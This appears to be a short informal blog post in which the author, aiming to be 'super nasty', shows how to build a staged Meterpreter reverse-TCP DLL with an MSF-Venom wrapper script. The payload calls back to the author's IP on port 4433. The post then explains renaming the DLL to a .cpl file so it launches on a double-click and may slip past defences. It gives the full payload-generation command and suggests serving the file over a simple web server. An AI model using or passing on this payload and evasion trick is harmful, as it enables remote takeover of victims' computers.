I was looking around at folder tricks and how they could be re-purposed for evil, gotta sharpen my mind to be super nasty (honey badger like if you will) anyway I was on this site
I thought Hmm what's this
.cpl file type business ... so I search my computer for one listed ...
It has the same icon as a .DLL, I wonder if it behaves like a .DLL
So, I jump on my Linux box and using g0tm1lk's MSF-Venom Payload Creator create a meterpreter dll that will as most of you can probably see, when executed connect back to 192.168.0.180 on port 4433
./mpc.sh dll 192.168.0.180 4433 msf reverse staged tcp
as you can see mpc even shows you how to make the payload accessible over the network via a simple Python web-server, so ... do that.
rename it from
You now have an executable meterpreter payload that will launch from a click, what's cool about this is that it IS a .dll but you cant doubleclick and launch it as a
.dll yet, a
.cpl file you can, this might only be useful for evasion in terms of it's an executable file extension that goes overlooked ... and i'll be looking for more
I didn't know about this technique until I was playing around
==Some other information on .cpl abuse ==
The TrendMicro piece is pretty good